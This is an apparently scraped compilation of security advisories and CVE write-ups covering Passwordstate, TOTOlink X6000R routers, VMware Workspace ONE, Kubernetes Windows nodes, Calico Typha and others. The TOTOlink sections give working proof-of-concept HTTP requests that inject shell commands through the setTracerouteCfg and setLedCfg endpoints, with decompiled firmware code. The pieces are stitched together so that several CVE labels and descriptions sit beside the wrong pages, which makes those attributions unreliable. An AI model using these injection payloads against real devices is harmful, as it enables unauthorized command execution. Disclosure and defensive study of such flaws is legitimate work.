Cross Site Request Forgery vulnerability in Click Studios (SA) Pty Ltd Passwordstate v.Build 9785 and before allows a local attacker to execute arbitrary code via a crafted request.

Incident Management Advisories

**Major Incidents**

**Click Studios has an established Incident Management Plan that is used in the event of major incidents affecting Passwordstate’s operation.**

As part of the Incident Management Process, Click Studios will email all customers advising to check this advisories page for updates. Advisories detail the best known information available, at a point in time, and are the only authorized updates for existing and potential customers, media and interested parties. By publishing these advisories, representing the single source of truth, Technical Support Team members, developers and Pre-Sales staff can focus solely on assisting customers with the major incident.

Please be aware that emails to Sales or Support, requesting additional information, will be replied to with a standard response directing the requestor to this Advisories page. Please understand, if Click Studios invokes the Incident Management Plan, our number one priority is working with our customers to identify if they have been affected and advising them of required remedial actions.

We recommend any interested party periodically check this advisories page for the latest updates.

**Advisories:**

There are no current major incidents at this time.

**Common Vulnerabilities and Exposures:**

The table below provides a list of Click Studios confirmed information-security vulnerabilities and exposures for Passwordstate or associated modules. Interested parties can subscribe to this list to be notified when new CVEs are added.

**_Date_**

*   2023-09-25
*   2023-08-31
*   2022-11-07
*   2022-09-05
*   2022-09-05
*   2020-10-29
*   2020-10-05
*   2018-08-01

**_CVE(s)_**

*   CVE Pending
*   CVE-2023-43295
*   CVE-2022-3877
*   CVE-2022-3875
*   CVE-2022-3876
*   CVE-2020-27747
*   CVE-2020-26061
*   CVE-2018-14776

**_Severity_**

*   Low
*   Low
*   Medium
*   High
*   Medium
*   Low
*   High
*   Low

**_Product_**

*   Passwordstate API
*   Passwordstate Core
*   Passwordstate Core
*   Passwordstate API
*   Passwordstate API
*   Mobile Web Site (Deprecated)
*   Password Reset Portal
*   Passwordstate Core

**_Description_**

*   Incorrect Access Control allowing the potential for an existing Security Administrator to use the System Wide API Key to interact with private password lists for Password History, delete and copy/move API endpoints.
*   Fixed a potential Cross-Site Request Forgery (CSRF) failure, for authenticated sessions, which allowed remote attackers who are able to trick a user into retrying a request to bypass CSRF protection and replay a carefully crafted request.
*   Cross site scripting vulnerability for URL field
*   Authentication bypass by assumed-immutable data
*   Manipulation of the argument PasswordID leads to authorization bypass
*   Lack of brute force attack detection on PIN code authentication
*   A well crafted HTTP request allowed setting a password for a registered user
*   XSS by authenticated users via an uploaded HTML document

**_Fixed_**

*   Build 9811
*   Build 9795
*   Build 9653
*   Build 9611
*   Build 9611
*   Build 8987
*   Build 8501
*   Build 8397

**Subscribe to our Annoucements/Advisories RSS Feed

Subscribe to our RSS Feed for the latest announcements and security advisories.

Simply add the URL of https://forums.clickstudios.com.au/forum/6-announcements.xml to your favorite RSS Reader.

  

**

CVE-2023-43295: Security - Click Studios

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.

**TOTOlink X6000R command injection****Product Information**

Device: TOTOlink X6000R  
Firmware version: V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

There is arbitrary command execution on the setLedCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 55Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/basic/qos.html?time=1694023460381Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"enable":"`ls>/web/test5.txt`","topicurl":"setLedCfg"}

Inject commands： “ls>/web/test5.txt”

Test results.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test5.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analysis**

The following functions in shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_411F90(__int64 a1, __int64 a2){  const char *v3; // x20  unsigned int v4; // w19  v3 = (const char *)sub_40BD6C(a1, "enable");  v4 = atoi(v3);  if ( *v3 && v4 <= 1 )  {    Uci_Set_Str(11LL, "main", "led_status", v3);    Uci_Commit(11LL);    set_led_status(v4);  }  datconf_set_by_key("/var/cste/temp_status", "mesh_update", "1");  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is an enable variable command splicing to bypass the execution, without any filtering!

The root cause comes from the following

Since the Uci\_Set\_Str function command arguments of the libcscommon.so library in shttpd are susceptible to operating system command injection. When the program calls get\_uci2json, it will call Uci\_Set\_Str in the so library, causing arbitrary command execution, and the permissionless operation of the interface setLanguageCfg leads to unauthorized arbitrary command execution.

In this part of shttpd, the relevant language settings are called

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  

    __int64 __fastcall sub_4117F8(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x23  int v6; // w0  int v8; // [xsp+44h] [xbp+44h] BYREF  char s[8]; // [xsp+48h] [xbp+48h] BYREF  __int64 v10; // [xsp+50h] [xbp+50h]  __int64 v11; // [xsp+58h] [xbp+58h]  __int64 v12; // [xsp+60h] [xbp+60h]  __int64 v13; // [xsp+68h] [xbp+68h]  __int64 v14; // [xsp+70h] [xbp+70h]  __int64 v15; // [xsp+78h] [xbp+78h]  __int64 v16; // [xsp+80h] [xbp+80h]  __int64 v17[8]; // [xsp+88h] [xbp+88h] BYREF  v4 = (const char *)sub_40BD6C(a1, "lang");  v5 = (const char *)sub_40BD6C(a1, "langAutoFlag");  v8 = 0;  *(_QWORD *)s = 0LL;  v10 = 0LL;  v11 = 0LL;  v12 = 0LL;  v13 = 0LL;  v14 = 0LL;  v15 = 0LL;  v16 = 0LL;  memset(v17, 0, sizeof(v17));  Uci_Set_Str();  Uci_Get_Int(11LL, "main", "lang_auto_flag", &v8);  v6 = atoi(v5);  if ( v6 != v8 )    Uci_Set_Str();  Uci_Commit(11LL);  snprintf(s, 0x40uLL, "helpurl_%s", v4);  Uci_Get_Str(15LL, "custom", s, v17);  if ( LOBYTE(v17[0]) )  {    *(_QWORD *)s = 0LL;    v10 = 0LL;    v11 = 0LL;    v12 = 0LL;    v13 = 0LL;    v14 = 0LL;    v15 = 0LL;    v16 = 0LL;    snprintf(s, 0x40uLL, "http://%s", (const char *)v17);  }  else  {    strcpy(s, "");  }  sub_40BDA0(a2, 1LL, "", 0LL, "0", s);  return 0LL;}

现在来看libcscommon.so

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

    ABEL_57:  while ( 1 )  {    off_2AB30(v12, 1024LL, "uci -c %s set %s.%s.%s=\"%s\"", v9, v10, a2, a3, a4);    off_2AD78(v12, 0LL);    result = 1LL;LABEL_58:    if ( v13 == *(_QWORD *)off_2A970 )      break;    off_2AC18();LABEL_60:    v9 = "/tmp/cste/";    v10 = "system_status";  }  return result;

The off\_2AD78 of them is LOAD:000000000002AD78 18 60 00 00 00 00 00 00 off\_2AD78 DCQ CsteSystem

That is, system

CVE-2023-46484: TOTOlink X6000R command injetction (setLedCfg)

VMware Workspace ONE UEM console contains an open redirect vulnerability.


A malicious actor may be able to redirect a victim to an attacker and retrieve their SAML response to login as the victim user.



Advisory ID: VMSA-2023-0025

CVSSv3 Range: 8.8

Issue Date: 2023-10-31

Updated On: 2023-10-31 (Initial Advisory)

CVE(s): CVE-2023-20886

Synopsis: VMware Workspace ONE UEM console updates address an open redirect vulnerability (CVE-2023-20886)

****1\. Impacted Products****

*   VMware Workspace ONE UEM console

****2\. Introduction****

An open redirect vulnerability in VMware Workspace ONE UEM console was responsibly reported to VMware. Updates are available to remediate this vulnerability in affected VMware products.

****3\. Advisory Details****

VMware Workspace ONE UEM console contains an open redirect vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8.

A malicious actor may be able to redirect a victim to an attacker and retrieve their SAML response to login as the victim user.

To remediate CVE-2023-20886 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' below.

VMware would like to thank D'Angelo Gonzalez of Crowdstrike for reporting this issue to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Workspace ONE UEM

2306

Any

CVE-2023-20886

N/A

N/A

Unaffected

N/A

N/A

Workspace ONE UEM

2302

Any

CVE-2023-20886

8.8

important

23.2.0.10

None

None

Workspace ONE UEM

2212

Any

CVE-2023-20886

8.8

important

22.12.0.20

None

None

Workspace ONE UEM

2209

Any

CVE-2023-20886

8.8

important

22.9.0.29

None

None

Workspace ONE UEM

2206

Any

CVE-2023-20886

8.8

important

22.6.0.36

None

None

Workspace ONE UEM

2203

Any

CVE-2023-20886

8.8

important

22.3.0.48

None

None

****4\. References****

****5\. Change Log****

**2023-10-31: VMSA-2023-0025  
**Initial security advisory.

****6\. Contact****

CVE-2023-20886: VMSA-2023-0025

An issue in TP-Link Tapo C100 v1.1.15 Build 211130 Rel.15378n(4555) and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted web request.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39610: publications/1.TP-Link Tapo C100 - HTTP Denial-Of-Service at main · zn9988/publications

A security issue was discovered in Kubernetes where a user
 that can create pods on Windows nodes may be able to escalate to admin 
privileges on those nodes. Kubernetes clusters are only affected if they
 include Windows nodes.


**Rita Zhang**

unread,

Aug 23, 2023, 5:27:37 PMAug 23

to kubernetes-announce, dev, kubernetes-sec...@googlegroups.com, kubernetes-security-discuss, distributo...@kubernetes.io

Hello Kubernetes Community,

A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.

This issue has been rated \*\***HIGH**\*\* (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H \- 8.8), and assigned \*\*CVE-2023-3676\*\*

**Am I vulnerable?**

Any kubernetes environment with Windows nodes is impacted.  Run \`kubectl get nodes -l kubernetes.io/os=windows\` to see if any Windows nodes are in use.

**Affected Versions**

\- kubelet <= v1.28.0

\- kubelet <= v1.27.4

\- kubelet <= v1.26.7

\- kubelet <= v1.25.12

\- kubelet <= v1.24.16

**How do I mitigate this vulnerability?**

The provided patch fully mitigates the vulnerability and has no known side effects.  Full mitigation for this class of issues requires patches applied for CVE-2023-3676, CVE-2023-3955, and CVE-2023-3893.

Outside of applying the provided patch, there are no known mitigations to this vulnerability.

**Fixed Versions**

\- kubelet v1.28.1

\- kubelet v1.27.5

\- kubelet v1.26.8

\- kubelet v1.25.13

\- kubelet v1.24.17

These releases will be published over the course of today, August 23rd, 2023.

To upgrade, refer to the documentation:

https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster

**Detection**

Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded powershell commands are a strong indication of exploitation. Config maps and secrets that contain embedded powershell commands and are mounted into pods are also a strong indication of exploitation.

If you find evidence that this vulnerability has been exploited, please contact secu...@kubernetes.io

**Additional Details**

See the GitHub issue for more details: https://github.com/kubernetes/kubernetes/issues/119339

**Acknowledgements**

This vulnerability was reported by Tomer Peled @tomerpeled92

The issue was fixed and coordinated by the fix team: 

James Sturtevant @jsturtevant

Mark Rossetti @marosset

Andy Zhang @andyzhangx

Justin Terry @jterry75

Kulwant Singh @KlwntSingh

Micah Hausler @micahhausler

Rita Zhang @ritazh

and release managers:

Jeremy Rickard @jeremyrickard

Thank You,

Rita Zhang on behalf of the Kubernetes Security Response Committee

CVE-2023-3676: [Security Advisory] CVE-2023-3676: Insufficient input sanitization on Windows nodes leads to privilege escalation

CVSS Rating: CVSS:3.1/av:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - **HIGH** (8.8)

A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.

**Am I vulnerable?**

Any kubernetes environment with Windows nodes is impacted. Run kubectl get nodes -l kubernetes.io/os=windows to see if any Windows nodes are in use.

**Affected Versions**

*   kubelet <= v1.28.0
*   kubelet <= v1.27.4
*   kubelet <= v1.26.7
*   kubelet <= v1.25.12
*   kubelet <= v1.24.16

**How do I mitigate this vulnerability?**

The provided patch fully mitigates the vulnerability (see fix impact below). Full mitigation for this class of issues requires patches applied for CVE-2023-3676, CVE-2023-3955, and CVE-2023-3893.

Outside of applying the provided patch, there are no known mitigations to this vulnerability.

**Fixed Versions**

*   kubelet master - fixed by Use environment variables for parameters in Powershell #120128
*   kubelet v1.28.1 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120134
*   kubelet v1.27.5 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120135
*   kubelet v1.26.8 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120136
*   kubelet v1.25.13 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120137
*   kubelet v1.24.17 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120138

**Fix impact:** Passing Windows Powershell disk format options to in-tree volume plugins will result in an error during volume provisioning on the node. There are no known use cases for this functionality, nor is this functionality supported by any known out-of-tree CSI driver.

To upgrade, refer to the documentation:  
https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/

**Detection**

Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded powershell commands are a strong indication of exploitation.

If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io

**Acknowledgements**

This vulnerability was discovered by James Sturtevant @jsturtevant and Mark Rossetti @marosset during the process of fixing CVE-2023-3676 (that original CVE was reported by Tomer Peled @tomerpeled92)

The issue was fixed and coordinated by the fix team:

James Sturtevant @jsturtevant  
Mark Rossetti @marosset  
Andy Zhang @andyzhangx  
Justin Terry @jterry75  
Kulwant Singh @KlwntSingh  
Micah Hausler @micahhausler  
Rita Zhang @ritazh

and release managers:

Jeremy Rickard @jeremyrickard

CVE-2023-3955: CVE-2023-3955: Insufficient input sanitization on Windows nodes leads to privilege escalation · Issue #119595 · kubernetes/kubernetes

In certain conditions for Calico Typha (v3.26.2, v3.25.1 and below), and Calico Enterprise Typha (v3.17.1, v3.16.3, v3.15.3 and below), a client TLS handshake can block the Calico Typha server indefinitely, resulting in denial of service. The TLS Handshake() call is performed inside the main server handle for loop without any timeout allowing an unclean TLS handshake to block the main loop indefinitely while other connections will be idle waiting for that handshake to finish.


**Description****Related issues/PRs****Todos**

*   Tests
*   Documentation
*   Release note

**Release Note****Reminder for the reviewer**

Make sure that this PR has the correct labels and milestone set.

Every PR needs one docs-* label.

*   docs-pr-required: This change requires a change to the documentation that has not been completed yet.
*   docs-completed: This change has all necessary documentation completed.
*   docs-not-required: This change has no user-facing impact and requires no docs.

Every PR needs one release-note-* label.

*   release-note-required: This PR has user-facing changes. Most PRs should have this label.
*   release-note-not-required: This PR has no user-facing changes.

Other optional labels:

*   cherry-pick-candidate: This PR should be cherry-picked to an earlier release. For bug fixes only.
*   needs-operator-pr: This PR is related to install and requires a corresponding change to the operator.

CVE-2023-41377: Move TLS handshake to per-connection goroutine by fasaxc · Pull Request #7993 · projectcalico/calico

A lack of rate limiting in Elenos ETG150 FM transmitter v3.12 allows attackers to obtain user credentials via brute force and cause other unspecified impacts.

CVE-2023-37832: Vulns/Lack of resources and rate limiting - Elenos.md at main · strik3r0x1/Vulns

An issue discovered in Nanoleaf Light strip v3.5.10 allows attackers to cause a denial of service via crafted write binding attribute commands.

Source

CVE